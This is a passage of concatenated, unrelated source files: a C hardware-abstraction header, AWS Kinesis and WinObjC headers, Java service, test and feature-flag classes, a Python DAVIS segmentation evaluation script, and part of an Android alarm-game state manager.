/*** Non volatile RAM interface ***/
#if HAL_NVRAM
/**
 * @brief NVRAM address type.
 */
typedef uint32_t HAL_nvram_address_t;
/**
* @brief Get NVRAM size
* @return
*/
HAL_nvram_address_t HAL_nvram_getsize();
/**
* @brief write byte to NVRAM
* @param address [in]
* @param dataByte [in]
*/
void HAL_nvram_write(HAL_nvram_address_t, uint8_t);
/**
* @brief read byte from NVRAM
* @param address
* @return byte
*/
uint8_t HAL_nvram_read(HAL_nvram_address_t);
/**
*
* @param address
* @param buf
* @param length
*/
void HAL_nvram_read_buf(HAL_nvram_address_t, void*, uint32_t);
/**
*
* @param address
* @param buf
* @param length
*/
void HAL_nvram_write_buf(HAL_nvram_address_t, const void*, uint32_t);
#endif /* HAL_NVRAM */
/*** Terminal interface ***/
typedef uint8_t HAL_terminal_t;
/**
* @param termno
* @param byte
*/
void HAL_terminal_write(HAL_terminal_t, uint8_t);
/**
* @param termno
* @return byte
*/
uint8_t HAL_terminal_read(HAL_terminal_t);
/**
 * @param termno
 * @return TRUE if data is ready to read
 */
BOOLEAN HAL_terminal_isdataready(HAL_terminal_t);
/*** External memory interface ***/
#if HAL_EXTMEM
/**
* File handle
*/
typedef uint8_t HAL_extmem_file_t;
/**
* Position in file/file size
*/
typedef uint32_t HAL_extmem_fileposition_t;
/**
* @brief Open file in external memory
* @param path
* @return file handle > 0 or 0 on error
*/
HAL_extmem_file_t HAL_extmem_openfile(const char[13]);
/**
* @brief Delete file from external memory
* @param path
*/
void HAL_extmem_deletefile(const char[13]);
/**
* @brief close opened file
* @param handle
*/
void HAL_extmem_closefile(HAL_extmem_file_t);
/**
* @brief Read byte from file
* @param handle
* @return byte
*/
uint8_t HAL_extmem_readfromfile(HAL_extmem_file_t);
/**
* @brief Write byte to file
* @param handle
* @param byte
*/
void HAL_extmem_writetofile(HAL_extmem_file_t, uint8_t);
/**
* @brief
* @param handle
* @return position
*/
HAL_extmem_fileposition_t HAL_extmem_getfileposition(HAL_extmem_file_t);
/**
* @brief Set position in file
* @param handle
* @param position
*/
void HAL_extmem_setfileposition(HAL_extmem_file_t, HAL_extmem_fileposition_t);
/**
* @brief handle
* @param handle
* @return file size
*/
HAL_extmem_fileposition_t HAL_extmem_getfilesize(HAL_extmem_file_t);
/**
* @brief
* @return
*/
uint32_t HAL_extmem_getfreespace();
/**
 * @brief Get number of files in external memory
 * @return number of files
 */
uint16_t HAL_extmem_getnumfiles();
/**
* @brief Get file name in a directory
* @param num [in] entry number
* @param name [out]
*/
void HAL_extmem_getfilename(uint16_t, char[13]);
/**
* @brief
* @param fname
* @return
*/
BOOLEAN HAL_extmem_fileExists(const char[13]);
#endif /* HAL_EXTMEM */
/*** Time interface ***/
/**
 * @brief Delay for an interval
 * @param ms milliseconds [in]
 */
void HAL_time_sleep_ms(uint32_t);
/**
* @brief get current time from system start
* @return time in milliseconds
*/
uint32_t HAL_time_gettime_ms();
/*** Random number interface ***/
void HAL_random_seed(uint32_t);
uint32_t HAL_random_generate(uint32_t);
#if HAL_GFX
typedef enum {
HAL_GFX_NOTACOLOR = 0,
HAL_GFX_COLOR_WHITE,
HAL_GFX_COLOR_BLACK,
HAL_GFX_COLOR_RED,
HAL_GFX_COLOR_GREEN,
HAL_GFX_COLOR_BLUE,
HAL_GFX_COLOR_CYAN,
HAL_GFX_COLOR_MAGENTA,
HAL_GFX_COLOR_YELLOW,
HAL_GFX_COLOR_GRAY,
HAL_GFX_NUMCOLORS
} HAL_gfx_color_t;
/**
* @param fgcolor
*/
void HAL_gfx_setColor(HAL_gfx_color_t);
/**
* @param bgcolor
*/
void HAL_gfx_setBgColor(HAL_gfx_color_t);
/**
* @param fgColor
* @param bgColor
*/
void HAL_gfx_setColors(HAL_gfx_color_t, HAL_gfx_color_t);
/**
* @param x
* @param y
*/
void HAL_gfx_point(uint16_t, uint16_t);
/**
* @param x
* @param y
* @param color
*/
void HAL_gfx_pointc(uint16_t, uint16_t, HAL_gfx_color_t);
/**
* @param x1
* @param y1
* @param x2
* @param y2
*/
void HAL_gfx_line(uint16_t, uint16_t, uint16_t, uint16_t);
/**
* @param x1
* @param y1
* @param x2
* @param y2
* @param color
*/
void HAL_gfx_linec(uint16_t, uint16_t, uint16_t, uint16_t, HAL_gfx_color_t);
/**
* @param x
* @param y
* @param w
* @param h
*/
void HAL_gfx_rect(uint16_t, uint16_t, uint16_t, uint16_t);
/**
* @param x
* @param y
* @param w
* @param h
* @param color
*/
void HAL_gfx_rectc(uint16_t, uint16_t, uint16_t, uint16_t, HAL_gfx_color_t);
/**
* @param x
* @param y
*/
void HAL_gfx_lineto(uint16_t, uint16_t);
/**
* @param x
* @param y
* @param color
*/
void HAL_gfx_linetoc(uint16_t, uint16_t, HAL_gfx_color_t);
/**
* @param x
* @param y
* @param r
*/
void HAL_gfx_circle(uint16_t, uint16_t, uint16_t);
/**
* @param x
* @param y
* @param r
* @param color
*/
void HAL_gfx_circlec(uint16_t, uint16_t, uint16_t, HAL_gfx_color_t);
#endif /* HAL_GFX */
#if HAL_GPIO
/**
* @brief write pin value
*/
void HAL_gpio_writePin(uint8_t, BOOLEAN);
/**
* @brief read pin value
*/
BOOLEAN HAL_gpio_readPin(uint8_t);
#endif /* HAL_GPIO */
#if HAL_BUZZER
/**
* @brief
*
* @param ch channel
* @param freq Frequency (HZ)
* @param dur duration (ms) 0 - endless
*/
void HAL_buzzer_tone(uint8_t, uint16_t, uint16_t);
/**
*
*/
void HAL_buzzer_notone(uint8_t);
#endif /* HAL_BUZZER */
__END_DECLS
#endif /* HAL_H */
| 2,649
|
388
|
<filename>aws/kinesis/core/kinesis_record.h
/*
* Copyright 2019 Amazon.com, Inc. or its affiliates.
* Licensed under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#ifndef AWS_KINESIS_CORE_KINESIS_RECORD_H_
#define AWS_KINESIS_CORE_KINESIS_RECORD_H_
#include <unordered_map>
#include <aws/kinesis/protobuf/messages.pb.h>
#include <aws/kinesis/core/serializable_container.h>
#include <aws/kinesis/core/user_record.h>
namespace aws {
namespace kinesis {
namespace core {
namespace detail {
class KeySet {
public:
std::pair<bool, uint32_t> add(const std::string& s);
bool empty() const;
void clear();
std::pair<bool, uint32_t> remove_one(const std::string& d);
const std::string& first() const;
private:
std::vector<std::string> keys_;
std::unordered_map<std::string, uint32_t> lookup_;
std::unordered_map<std::string, size_t> counts_;
};
} // namespace detail
class KinesisRecord : public SerializableContainer<UserRecord> {
public:
static constexpr const char* kMagic = "\xF3\x89\x9A\xC2";
KinesisRecord();
size_t accurate_size() override;
size_t estimated_size() override;
std::string serialize() override;
std::string partition_key() const;
std::string explicit_hash_key() const;
protected:
void after_add(const std::shared_ptr<UserRecord>& ur) override;
void after_remove(const std::shared_ptr<UserRecord>& ur) override;
void after_clear() override;
private:
static const size_t kFixedOverhead = 4 + 16;
aws::kinesis::protobuf::AggregatedRecord aggregated_record_;
detail::KeySet explicit_hash_keys_;
detail::KeySet partition_keys_;
size_t estimated_size_;
size_t cached_accurate_size_;
bool cached_accurate_size_valid_;
};
} //namespace core
} //namespace kinesis
} //namespace aws
#endif //AWS_KINESIS_CORE_KINESIS_RECORD_H_
| 782
|
392
|
<gh_stars>100-1000
package com.platform.service;
import com.platform.dao.ApiAdMapper;
import com.platform.entity.AdVo;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import java.util.List;
import java.util.Map;
/**
 * Service exposing CRUD operations for advertisements ({@code AdVo}),
 * delegating all persistence work to {@link ApiAdMapper}.
 */
@Service
public class ApiAdService {

    // NOTE(review): field injection works but constructor injection would make
    // the dependency explicit and testable — confirm project convention.
    @Autowired
    private ApiAdMapper adDao;

    /** Loads a single advertisement by its id. */
    public AdVo queryObject(Integer id) {
        return adDao.queryObject(id);
    }

    /** Queries advertisements matching the given filter/paging parameters. */
    public List<AdVo> queryList(Map<String, Object> map) {
        return adDao.queryList(map);
    }

    /** Counts advertisements matching the given filter parameters. */
    public int queryTotal(Map<String, Object> map) {
        return adDao.queryTotal(map);
    }

    /** Persists a new advertisement. */
    public void save(AdVo brand) {
        adDao.save(brand);
    }

    /** Updates an existing advertisement. */
    public void update(AdVo brand) {
        adDao.update(brand);
    }

    /** Deletes the advertisement with the given id. */
    public void delete(Integer id) {
        adDao.delete(id);
    }

    /** Deletes all advertisements whose ids are in the given array. */
    public void deleteBatch(Integer[] ids) {
        adDao.deleteBatch(ids);
    }
}
| 400
|
6,717
|
//******************************************************************************
//
// Copyright (c) 2016 Intel Corporation. All rights reserved.
// Copyright (c) Microsoft. All rights reserved.
//
// This code is licensed under the MIT License (MIT).
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
// THE SOFTWARE.
//
//******************************************************************************
#pragma once
#import <CoreGraphics/CGGradient.h>
#import <vector>
#import "CoreGraphicsInternal.h"
#include <objc/runtime.h>
size_t _CGGradientGetCount(CGGradientRef gradient);
const std::vector<CGFloat>& _CGGradientGetStopLocations(CGGradientRef gradient);
const std::vector<CGFloat>& _CGGradientGetColorComponents(CGGradientRef gradient);
CGColorSpaceRef _CGGradientGetColorSpace(CGGradientRef gradient);
| 352
|
3,066
|
<reponame>skofra0/crate<gh_stars>1000+
/*
* Licensed to Crate.io GmbH ("Crate") under one or more contributor
* license agreements. See the NOTICE file distributed with this work for
* additional information regarding copyright ownership. Crate licenses
* this file to you under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License. You may
* obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*
* However, if you have executed another commercial license agreement
* with Crate these terms will supersede the license and you may use the
* software solely pursuant to the terms of the relevant commercial agreement.
*/
package io.crate.expression.scalar;
import org.hamcrest.core.IsSame;
import org.junit.Test;
import java.time.*;
import static io.crate.testing.Asserts.assertThrowsMatches;
import static org.hamcrest.core.IsNot.not;
/**
 * Tests for the scalar {@code date_bin(interval, source, origin)} function, which
 * maps a source timestamp onto the start of the interval-sized bin it falls in,
 * with the bin grid anchored at {@code origin}.
 */
public class DateBinFunctionTest extends ScalarTestCase {

    private static final LocalDateTime FIRST_JAN_2001_MIDNIGHT_UTC_AS_DATE = LocalDate.of(2001, Month.JANUARY, 1).atStartOfDay();
    private static final LocalDateTime FIRST_JAN_1969_MIDNIGHT_UTC_AS_DATE = LocalDate.of(1969, Month.JANUARY, 1).atStartOfDay();

    @Test
    public void test_interval_is_value_compile_gets_new_instance() {
        // A concrete interval literal allows compile() to specialize the function,
        // so a different instance must be returned.
        assertCompile("date_bin('1 day' :: INTERVAL, timestamp, timestamp)", (s) -> not(IsSame.sameInstance(s)));
    }

    @Test
    public void compile_on_null_interval_gets_same_instance() {
        // A null interval cannot be specialized; the original instance is kept.
        assertCompile("date_bin(null, timestamp, timestamp)", (s) -> IsSame.sameInstance(s));
    }

    @Test
    public void test_at_least_one_arg_is_null_returns_null() {
        assertEvaluate("date_bin(null, CURRENT_TIMESTAMP, CURRENT_TIMESTAMP)", null);
        assertEvaluate("date_bin('1 day' :: INTERVAL , null, CURRENT_TIMESTAMP)", null);
        assertEvaluate("date_bin('1 day' :: INTERVAL , CURRENT_TIMESTAMP, null)", null);
    }

    @Test
    public void test_interval_is_zero_exception_thrown() {
        // A zero-width bin is meaningless and must be rejected.
        assertThrowsMatches(() -> assertEvaluate("date_bin('0 days' :: INTERVAL, CURRENT_TIMESTAMP, 0)", null),
                            IllegalArgumentException.class,
                            "Interval cannot be zero");
    }

    @Test
    public void test_same_value_as_date_trunc() {
        // With an origin aligned to the unit boundary, date_bin degenerates to date_trunc.
        assertEvaluate("date_bin('1 day' :: INTERVAL, CURRENT_TIMESTAMP, 0) = DATE_TRUNC('day', CURRENT_TIMESTAMP)", true);
        assertEvaluate("date_bin('1 week' :: INTERVAL, CURRENT_TIMESTAMP, '2001-01-01T00:00:00Z'::timestamp without time zone) " +
                       " = DATE_TRUNC('week', CURRENT_TIMESTAMP)", true);
    }

    @Test
    public void test_called_twice_same_result() {
        // date_bin must be deterministic for identical arguments.
        assertEvaluate("date_bin('1 day' :: INTERVAL, CURRENT_TIMESTAMP, 0) = date_bin('1 day' :: INTERVAL, CURRENT_TIMESTAMP, 0)",
                       true);
    }

    @Test
    public void test_diff_magnitude_smaller_than_interval_magnitude_returns_beginning_of_the_bin() {
        // This test checks case when abs(origin-ts) < abs(interval).
        // origin < ts, beginning of the bin is origin for any sign of interval
        long expected = FIRST_JAN_2001_MIDNIGHT_UTC_AS_DATE.toEpochSecond(ZoneOffset.UTC) * 1000;
        assertEvaluate("date_bin('8 days'::interval, '2001-01-04 00:00:00' :: timestamp without time zone, " +
                       " '2001-01-01 00:00:00' :: timestamp without time zone)", expected);
        assertEvaluate("date_bin('-8 days'::interval, '2001-01-04 00:00:00' :: timestamp without time zone, " +
                       " '2001-01-01 00:00:00' :: timestamp without time zone)", expected);
        // ts < origin, beginning of the bin is origin - abs(interval)
        long expected1 = LocalDate.of(2001, Month.JANUARY, 4).atStartOfDay().minusDays(8).toEpochSecond(ZoneOffset.UTC) * 1000;
        assertEvaluate("date_bin('8 days'::interval, '2001-01-01 00:00:00' :: timestamp without time zone," +
                       " '2001-01-04 00:00:00' :: timestamp without time zone)", expected1);
        assertEvaluate("date_bin('-8 days'::interval, '2001-01-01 00:00:00' :: timestamp without time zone," +
                       " '2001-01-04 00:00:00' :: timestamp without time zone)", expected1);
    }

    @Test
    public void test_interval_any_sign_source_equal_to_origin_returns_origin() {
        // When source == origin, the bin start is the origin itself regardless of sign.
        long expected = FIRST_JAN_2001_MIDNIGHT_UTC_AS_DATE.toEpochSecond(ZoneOffset.UTC) * 1000;
        assertEvaluate("date_bin('7 weeks' :: INTERVAL, '2001-01-01 00:00:00' :: timestamp without time zone," +
                       " '2001-01-01 00:00:00' :: timestamp without time zone)", expected);
        assertEvaluate("date_bin('-7 weeks' :: INTERVAL, '2001-01-01 00:00:00' :: timestamp without time zone ," +
                       " '2001-01-01 00:00:00' :: timestamp without time zone)", expected);
    }

    @Test
    public void test_interval_any_sign_timestamp_bigint() {
        // 4 days past epoch, binned by 3 days, lands at the 3-day mark.
        assertEvaluate("date_bin('3 days' :: INTERVAL, 86400000*4, 0)", 86400000 * 3L);
        assertEvaluate("date_bin('-3 days' :: INTERVAL, 86400000*4, 0)", 86400000 * 3L);
    }

    @Test
    public void test_interval_any_sign_timestamp_without_zone() {
        // Timeline is split by 2 min intervals.
        // Timestamp is midnight + 7 min and interval begin is midnight + 6 min
        long expected = FIRST_JAN_1969_MIDNIGHT_UTC_AS_DATE.plusMinutes(6).toEpochSecond(ZoneOffset.UTC) * 1000;
        assertEvaluate("date_bin('2 minutes' :: INTERVAL, '1969-01-01T00:07:00Z'::timestamp without time zone, 0)", expected);
        assertEvaluate("date_bin('-2 minutes' :: INTERVAL, '1969-01-01T00:07:00Z'::timestamp without time zone, 0)", expected);
    }

    @Test
    public void test_interval_any_sign_timestamp_with_zone() {
        // Timeline is split by 4 hours intervals.
        // Timestamp is 9 AM at UTC+2 and interval begin is 8 AM in UTC+2.
        long expected = FIRST_JAN_1969_MIDNIGHT_UTC_AS_DATE
            .plusHours(8) // 4k interval begin is 8AM
            .toEpochSecond(ZoneOffset.ofHours(2)) * 1000;
        assertEvaluate("date_bin('4 hours' :: INTERVAL, '1969-01-01T09:00:00+0200'::timestamp with time zone , TIMEZONE('+02:00', 0))", expected);
        assertEvaluate("date_bin('-4 hours' :: INTERVAL, '1969-01-01T09:00:00+0200'::timestamp with time zone , TIMEZONE('+02:00', 0))", expected);
    }
}
| 2,521
|
4,054
|
<reponame>Anlon-Burke/vespa
// Copyright Yahoo. Licensed under the terms of the Apache 2.0 license. See LICENSE in the project root.
package com.yahoo.vespa.flags;
import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.node.DoubleNode;
import javax.annotation.concurrent.Immutable;
/**
* @author freva
*/
/**
 * Unbound feature flag holding a {@code double} value, serialized as a JSON
 * floating-point number.
 *
 * @author freva
 */
@Immutable
public class UnboundDoubleFlag extends UnboundFlagImpl<Double, DoubleFlag, UnboundDoubleFlag> {
    /** Creates the flag with an empty default fetch vector. */
    public UnboundDoubleFlag(FlagId id, double defaultValue) {
        this(id, defaultValue, new FetchVector());
    }

    /**
     * @param id flag identifier
     * @param defaultValue value used when no override applies
     * @param defaultFetchVector dimensions always applied when resolving the flag
     */
    public UnboundDoubleFlag(FlagId id, Double defaultValue, FetchVector defaultFetchVector) {
        super(id, defaultValue, defaultFetchVector,
              new SimpleFlagSerializer<>(DoubleNode::new, JsonNode::isFloatingPointNumber, JsonNode::asDouble),
              UnboundDoubleFlag::new, DoubleFlag::new);
    }
}
| 316
|
567
|
import os
import sys
import numpy as np
import pandas
from time import time
from collections import defaultdict
from davis2017.evaluation import DAVISEvaluation
from davis2017 import utils
from davis2017.metrics import db_eval_boundary, db_eval_iou
davis_root = 'input_dir/ref'
methods_root = 'examples'
def test_task(task, gt_set, res_path, J_target=None, F_target=None, metric=('J', 'F')):
    """Evaluate a method's results on a DAVIS task/split and optionally check targets.

    Args:
        task: 'semi-supervised' or 'unsupervised'.
        gt_set: ground-truth split, e.g. 'val', 'train' or 'test-dev'.
        res_path: directory containing the method's result masks.
        J_target: optional [mean, recall, decay] values expected for the J measure.
        F_target: optional [mean, recall, decay] values expected for the F measure.
        metric: which measures to compute; missing ones are zero-filled.

    Returns:
        Tuple (J, F) of per-measure dicts with 'M' (mean), 'R' (recall) and
        'D' (decay) arrays over sequences.
    """
    dataset_eval = DAVISEvaluation(davis_root=davis_root, gt_set=gt_set, task=task, codalab=True)
    metrics_res = dataset_eval.evaluate(res_path, debug=False, metric=metric)
    num_seq = len(list(dataset_eval.dataset.get_sequences()))
    # If a measure was not requested, substitute all-zero placeholders so the
    # summary table below can still be assembled.
    J = metrics_res['J'] if 'J' in metric else {'M': np.zeros(num_seq), 'R': np.zeros(num_seq), 'D': np.zeros(num_seq)}
    F = metrics_res['F'] if 'F' in metric else {'M': np.zeros(num_seq), 'R': np.zeros(num_seq), 'D': np.zeros(num_seq)}
    if gt_set == "val" or gt_set == "train" or gt_set == "test-dev":
        sys.stdout.write("----------------Global results in CSV---------------\n")
        g_measures = ['J&F-Mean', 'J-Mean', 'J-Recall', 'J-Decay', 'F-Mean', 'F-Recall', 'F-Decay']
        final_mean = (np.mean(J["M"]) + np.mean(F["M"])) / 2. if 'J' in metric and 'F' in metric else 0
        g_res = np.array([final_mean, np.mean(J["M"]), np.mean(J["R"]), np.mean(J["D"]), np.mean(F["M"]), np.mean(F["R"]), np.mean(F["D"])])
        table_g = pandas.DataFrame(data=np.reshape(g_res, [1, len(g_res)]), columns=g_measures)
        table_g.to_csv(sys.stdout, index=False, float_format="%0.3f")
    # NOTE(review): check_results_similarity's parameters are named (target, result)
    # but receive (computed, expected) here — confirm before renaming either side.
    if J_target is not None:
        assert check_results_similarity(J, J_target), f'J {print_error(J, J_target)}'
    if F_target is not None:
        assert check_results_similarity(F, F_target), f'F {print_error(F, F_target)}'
    return J, F
def check_results_similarity(target, result):
    """Return True when mean/recall/decay all match within an absolute tolerance.

    NOTE(review): despite the names, callers pass the computed metrics dict as
    `target` and the expected [M, R, D] list as `result` — verify before renaming.
    """
    tolerance = 0.001
    checks = tuple(
        np.isclose(np.mean(target[key]) - result[index], 0, atol=tolerance)
        for index, key in enumerate(('M', 'R', 'D'))
    )
    return checks[0] & checks[1] & checks[2]
def print_error(target, result):
    """Build a tab-separated message comparing mean metrics against expected values."""
    pieces = []
    for key, expected in zip(('M', 'R', 'D'), result):
        pieces.append(f'{key}:{np.mean(target[key])} = {expected}')
    return '\t'.join(pieces)
def test_semisupervised_premvos():
    """Regression-check PREMVOS semi-supervised results on DAVIS val and test-dev."""
    method_path = os.path.join(methods_root, 'premvos')
    expected = {
        'val': ([0.739, 0.831, 0.162], [0.818, 0.889, 0.195]),
        'test-dev': ([0.675, 0.768, 0.217], [0.758, 0.843, 0.206]),
    }
    for gt_set, (j_target, f_target) in expected.items():
        print(f'Evaluating PREMVOS {gt_set}')
        test_task('semi-supervised', gt_set, method_path, j_target, f_target)
    print('\n')
def test_semisupervised_onavos():
    """Regression-check OnAVOS semi-supervised results on DAVIS val and test-dev."""
    method_path = os.path.join(methods_root, 'onavos')
    expected = {
        'val': ([0.616, 0.674, 0.279], [0.691, 0.754, 0.266]),
        'test-dev': ([0.499, 0.543, 0.230], [0.557, 0.603, 0.234]),
    }
    for gt_set, (j_target, f_target) in expected.items():
        print(f'Evaluating OnAVOS {gt_set}')
        test_task('semi-supervised', gt_set, method_path, j_target, f_target)
    print('\n')
def test_semisupervised_osvos():
    """Regression-check OSVOS semi-supervised results on DAVIS val and test-dev."""
    method_path = os.path.join(methods_root, 'osvos')
    expected = {
        'val': ([0.566, 0.638, 0.261], [0.639, 0.738, 0.270]),
        'test-dev': ([0.470, 0.521, 0.192], [0.548, 0.597, 0.198]),
    }
    for gt_set, (j_target, f_target) in expected.items():
        print(f'Evaluating OSVOS {gt_set}')
        test_task('semi-supervised', gt_set, method_path, j_target, f_target)
    print('\n')
def test_unsupervised_flip_gt():
    """Sanity check: a random permutation of the GT objects must score perfectly.

    Generates the permuted proposals on first use (cached on disk afterwards)
    and expects J = F = (mean 1, recall 1, decay 0).
    """
    print('Evaluating Unsupervised Permute GT')
    method_path = os.path.join(methods_root, 'swap_gt')
    if not os.path.isdir(method_path):
        utils.generate_random_permutation_gt_obj_proposals(davis_root, 'val', method_path)
        # utils.generate_random_permutation_gt_obj_proposals('test-dev', method_path)
    J_val = [1, 1, 0]
    F_val= [1, 1, 0]
    test_task('unsupervised', 'val', method_path, J_val, F_val)
    # test_task('unsupervised', 'test-dev', method_path, J_val, F_val)
def test_unsupervised_rvos():
    """Run the unsupervised evaluation for RVOS on val (no target values checked)."""
    print('Evaluating RVOS')
    method_path = os.path.join(methods_root, 'rvos')
    test_task('unsupervised', 'val', method_path)
    # test_task('unsupervised', 'test-dev', method_path)
def test_unsupervsied_multiple_proposals(num_proposals=20, metric=('J', 'F')):
    """Generate `num_proposals` object proposals per sequence and evaluate them.

    (Name keeps the historical 'unsupervsied' typo — callers elsewhere in this
    file use it, so renaming would break them.)
    """
    print('Evaluating Multiple Proposals')
    method_path = os.path.join(methods_root, f'generated_proposals_{num_proposals}')
    utils.generate_obj_proposals(davis_root, 'val', num_proposals, method_path)
    # utils.generate_obj_proposals('test-dev', num_proposals, method_path)
    test_task('unsupervised', 'val', method_path, metric=metric)
    # test_task('unsupervised', 'test-dev', method_path, metric=metric)
def test_void_masks():
    """Pixels under the void mask must be ignored by both the J and F measures."""
    shape = (2, 200, 200)
    gt = np.zeros(shape)
    mask = np.zeros(shape)
    void = np.zeros(shape)
    # Prediction covers the GT square plus an extra region that is entirely void,
    # so with void masking both measures must still be perfect.
    gt[:, 100:150, 100:150] = 1
    void[:, 50:100, 100:150] = 1
    mask[:, 50:150, 100:150] = 1
    assert np.mean(db_eval_iou(gt, mask, void)) == 1
    assert np.mean(db_eval_boundary(gt, mask, void)) == 1
def benchmark_number_proposals():
    """Time the unsupervised evaluation for several proposal counts.

    Runs once computing only J, then once computing both J and F; results from
    earlier runs are preserved in the comments below for comparison.
    """
    number_proposals = [10, 15, 20, 30]
    timing_results = defaultdict(dict)
    for n in number_proposals:
        time_start = time()
        test_unsupervsied_multiple_proposals(n, 'J')
        timing_results['J'][n] = time() - time_start

    for n in number_proposals:
        time_start = time()
        test_unsupervsied_multiple_proposals(n)
        timing_results['J_F'][n] = time() - time_start

    print(f'Using J {timing_results["J"]}')
    print(f'Using J&F {timing_results["J_F"]}')
    # Using J {10: 156.45335865020752, 15: 217.91797709465027, 20: 282.0747673511505, 30: 427.6770250797272}
    # Using J & F {10: 574.3529748916626, 15: 849.7542386054993, 20: 1123.4619634151459, 30: 1663.6704666614532}
    # Codalab
    # Using J & F {10: 971.196366071701, 15: 1473.9757001399994, 20: 1918.787559747696, 30: 3007.116141319275}
if __name__ == '__main__':
    # Smoke-test entry point: runs the metric sanity check, then the regression
    # checks for each method (slow ones left commented out).
    # Test void masks
    test_void_masks()
    # Test semi-supervised methods
    test_semisupervised_premvos()
    test_semisupervised_onavos()
    test_semisupervised_osvos()
    # Test unsupervised methods
    test_unsupervised_flip_gt()
    # test_unsupervised_rvos()
    test_unsupervsied_multiple_proposals()
| 2,937
|
385
|
/*
*
* Copyright (c) Microsoft. All rights reserved.
* Licensed under the MIT license.
*
* Project Oxford: http://ProjectOxford.ai
*
* Project Oxford Mimicker Alarm Github:
* https://github.com/Microsoft/ProjectOxford-Apps-MimickerAlarm
*
* Copyright (c) Microsoft Corporation
* All rights reserved.
*
* MIT License:
* Permission is hereby granted, free of charge, to any person obtaining
* a copy of this software and associated documentation files (the
* "Software"), to deal in the Software without restriction, including
* without limitation the rights to use, copy, modify, merge, publish,
* distribute, sublicense, and/or sell copies of the Software, and to
* permit persons to whom the Software is furnished to do so, subject to
* the following conditions:
*
* The above copyright notice and this permission notice shall be
* included in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND,
* EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
* NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
* LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
* OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
* WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*
*/
package com.microsoft.mimickeralarm.mimics;
import android.util.Log;
import android.view.View;
import java.lang.ref.WeakReference;
/**
* This class coordinates Mimic game state between the common UI controls:
* The countdown timer across the top of the screen
* The progress button which is used to capture images or audio
* The banner which animates across the screen giving user feedback
*
* This class should be instantiated in a Mimic game fragment. The fragment should
* implement IMimicImplementation and register itself and its controls with the class. This
* class implements the IMimicMediator interface
*
* The fragment should call into this class in the following cases:
* It should register the appropriate controls and itself
* The fragment onStart and onStop implementations should call start and stop
* All game failure/success cases must call into this class
*
* The fragment can optionally call the isMimicRunning method to determine whether to do any
* further processing.
*/
public class MimicStateManager implements IMimicMediator {

    // Constant log tag; made final — it is never reassigned and should not be.
    private static final String TAG = "MimicStateManager";

    // Controls registered by the hosting fragment.
    // NOTE(review): package-private visibility kept as-is; tighten to private once
    // it is confirmed nothing else in this package reads these fields directly.
    MimicStateBanner mMimicStateBanner;
    CountDownTimerView mCountDownTimer;
    ProgressButton mProgressButton;
    MimicButtonBehavior mButtonBehavior;
    // Weak reference so this mediator never keeps a torn-down fragment alive.
    WeakReference<IMimicImplementation> mMimicRef;
    boolean mMimicRunning;

    // Should be called from Fragment::onStart, which is when it becomes visible to the user
    public void start() {
        Log.d(TAG, "Entered start!");
        mMimicRunning = true;
        mCountDownTimer.start();
        IMimicImplementation mimic = mMimicRef.get();
        if (mimic != null) {
            mimic.initializeCapture();
        }
    }

    // Should be called from Fragment::onStop, when the fragment is invisible
    public void stop() {
        Log.d(TAG, "Entered stop!");
        mMimicRunning = false;
        IMimicImplementation mimic = mMimicRef.get();
        if (mimic != null) {
            mimic.stopCapture();
        }
        mProgressButton.setReady();
    }

    /** Whether the game is currently between start() and stop(). */
    public boolean isMimicRunning() {
        return mMimicRunning;
    }

    /**
     * Reports success: stops the timer, shows the success banner, and notifies
     * the mimic implementation once the banner animation completes.
     */
    public void onMimicSuccess(String successMessage) {
        Log.d(TAG, "Entered onMimicSuccess!");
        if (isMimicRunning()) {
            handleButtonState();
            mCountDownTimer.stop();
            mMimicStateBanner.success(successMessage, new MimicStateBanner.Command() {
                @Override
                public void execute() {
                    Log.d(TAG, "Entered onMimicSuccess callback!");
                    // Re-check: the fragment may have been stopped while the banner animated.
                    if (isMimicRunning()) {
                        IMimicImplementation mimic = mMimicRef.get();
                        if (mimic != null) {
                            mimic.onSucceeded();
                        }
                    }
                }
            });
        }
    }

    /**
     * Reports a recoverable failure: pauses the timer, shows the failure banner,
     * then resumes the timer so the user can retry.
     */
    public void onMimicFailureWithRetry(String failureMessage) {
        Log.d(TAG, "Entered onMimicFailureWithRetry!");
        // If the countdown timer has just expired and has already registered a failure command,
        // then we should avoid changing state
        if (isMimicRunning() && !mCountDownTimer.hasExpired()) {
            mCountDownTimer.pause();
            mMimicStateBanner.failure(failureMessage, new MimicStateBanner.Command() {
                @Override
                public void execute() {
                    Log.d(TAG, "Entered onMimicFailureWithRetry callback!");
